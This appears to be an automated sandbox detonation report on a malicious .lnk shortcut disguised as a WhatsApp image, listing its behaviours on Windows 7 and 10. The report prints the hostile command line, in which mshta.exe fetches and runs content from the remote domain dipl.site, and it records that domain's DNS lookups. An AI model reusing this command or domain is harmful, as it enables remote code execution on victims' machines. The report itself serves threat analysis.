Analysis Overview
SHA256
683c61f8dda90ea3b1e76f2ff5ad78dc03ebe3827d56536988a9c5e4490eabd2
Threat Level: Known bad
The file WhatsApp_Image_2024-05-06.lnk was found to be: Known bad.
Malicious Activity Summary
Checks computer location settings
Enumerates physical storage devices
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 03:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 03:21
Reported
2024-06-13 03:24
Platform
win7-20240508-en
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2156 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
| PID 2156 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
| PID 2156 wrote to memory of 2644 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "https://dipl.site/Content/2022-23/01/03/" & mshta.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dipl.site | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 03:21
Reported
2024-06-13 03:24
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4988 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
| PID 4988 wrote to memory of 2976 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\mshta.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\WhatsApp_Image_2024-05-06.lnk
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "https://dipl.site/Content/2022-23/01/03/" & mshta.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dipl.site | udp |